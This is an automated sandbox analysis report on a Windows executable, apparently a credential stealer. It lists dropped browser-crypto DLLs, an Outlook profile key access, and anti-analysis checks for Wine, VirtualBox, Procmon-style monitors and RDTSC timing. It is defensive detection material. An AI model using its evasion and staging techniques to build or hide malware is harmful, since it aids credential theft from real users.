Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: h4ZgewNxoj.exe Static file information: File size 1775616 > 1048576
Source: h4ZgewNxoj.exe Static PE information: Raw size of cndowtni is bigger than: 0x100000 < 0x197400
Source: Binary string: mozglue.pdbP source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Unpacked PE file: 0.2.h4ZgewNxoj.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cndowtni:EW;utdrbhcl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cndowtni:EW;utdrbhcl:EW;.taggant:EW;
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: h4ZgewNxoj.exe Static PE information: real checksum: 0x1b80fa should be: 0x1bc0c5
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: h4ZgewNxoj.exe Static PE information: section name: .idata
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: h4ZgewNxoj.exe Static PE information: section name: cndowtni
Source: h4ZgewNxoj.exe Static PE information: section name: utdrbhcl
Source: h4ZgewNxoj.exe Static PE information: section name: .taggant
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B536 push ecx; ret 0_2_6C50B549
Source: h4ZgewNxoj.exe Static PE information: section name: cndowtni entropy: 7.954230799311721
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5355F0

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 94007F second address: 940083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 940083 second address: 940087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 940087 second address: 93F8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b sbb ax, 58CEh 0x00000010 mov dword ptr [ebp+122D1BADh], edi 0x00000016 popad 0x00000017 push dword ptr [ebp+122D0C79h] 0x0000001d or dword ptr [ebp+122D192Bh], esi 0x00000023 call dword ptr [ebp+122D22A5h] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D1B86h], edi 0x00000030 xor eax, eax 0x00000032 jbe 00007FDFF8F79166h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jo 00007FDFF8F7916Bh 0x00000042 jmp 00007FDFF8F79165h 0x00000047 mov dword ptr [ebp+122D3592h], eax 0x0000004d mov dword ptr [ebp+122D1992h], esi 0x00000053 mov esi, 0000003Ch 0x00000058 xor dword ptr [ebp+122D1A21h], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 add dword ptr [ebp+122D1B86h], esi 0x00000068 lodsw 0x0000006a add dword ptr [ebp+122D1A21h], edi 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007FDFF8F79169h 0x00000079 stc 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D1992h], ebx 0x00000084 nop 0x00000085 push eax 0x00000086 push edx 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 93F8F0 second address: 93F8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB9AA9 second address: AB9AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB9AB1 second address: AB9ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB9ABA second address: AB9ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB9ABE second address: AB9AC8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDFF9160A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB9AC8 second address: AB9AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB9AD0 second address: AB9AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB1200 second address: AB1206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB1206 second address: AB1220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDFF9160A2Fh 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8BEC second address: AB8BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDFF8F79156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8BF6 second address: AB8C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FDFF9160A34h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8C18 second address: AB8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8C1C second address: AB8C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FDFF9160A2Ah 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 jns 00007FDFF9160A26h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8DB8 second address: AB8DC2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8DC2 second address: AB8DD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8DD6 second address: AB8DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB8F21 second address: AB8F28 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB90A3 second address: AB90B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnl 00007FDFF8F79156h 0x0000000f jnp 00007FDFF8F79156h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AB90B9 second address: AB90E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A38h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007FDFF9160A26h 0x00000010 jns 00007FDFF9160A26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABCE8C second address: ABCE91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABCE91 second address: ABCEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDFF9160A26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f jmp 00007FDFF9160A39h 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD096 second address: ABD09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD09A second address: ABD0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FDFF9160A26h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 36BEB63Ah 0x00000018 jns 00007FDFF9160A31h 0x0000001e push 00000003h 0x00000020 stc 0x00000021 push 00000000h 0x00000023 movsx edi, si 0x00000026 push 00000003h 0x00000028 pushad 0x00000029 mov eax, dword ptr [ebp+122D34DEh] 0x0000002f mov ebx, dword ptr [ebp+122D365Ah] 0x00000035 popad 0x00000036 push C68A6AD1h 0x0000003b push ecx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD0E4 second address: ABD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ecx 0x00000008 xor dword ptr [esp], 068A6AD1h 0x0000000f call 00007FDFF8F79160h 0x00000014 mov cl, 7Fh 0x00000016 pop edx 0x00000017 lea ebx, dword ptr [ebp+12450D8Eh] 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FDFF8F79158h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FDFF8F7915Ch 0x00000041 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD142 second address: ABD151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD151 second address: ABD157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD157 second address: ABD15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD15B second address: ABD16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD1D4 second address: ABD214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edx, 2E943676h 0x00000012 push ebx 0x00000013 ja 00007FDFF9160A29h 0x00000019 pop ecx 0x0000001a push 00000000h 0x0000001c mov edi, 58486A0Fh 0x00000021 call 00007FDFF9160A29h 0x00000026 push eax 0x00000027 push edx 0x00000028 jo 00007FDFF9160A2Ch 0x0000002e je 00007FDFF9160A26h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD214 second address: ABD22D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD22D second address: ABD24E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FDFF9160A28h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push esi 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ABD352 second address: ABD358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADB931 second address: ADB93D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADB93D second address: ADB95C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDFF8F79169h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADB95C second address: ADB961 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADC42E second address: ADC432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADC432 second address: ADC44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDFF9160A33h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AD1D83 second address: AD1D93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FDFF8F79162h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AD1D93 second address: AD1D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA6DEC second address: AA6E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79161h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADCF4B second address: ADCF50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD0C1 second address: ADD0D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F79162h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD0D7 second address: ADD0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD0DB second address: ADD0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD0E1 second address: ADD10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FDFF9160A2Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDFF9160A2Fh 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
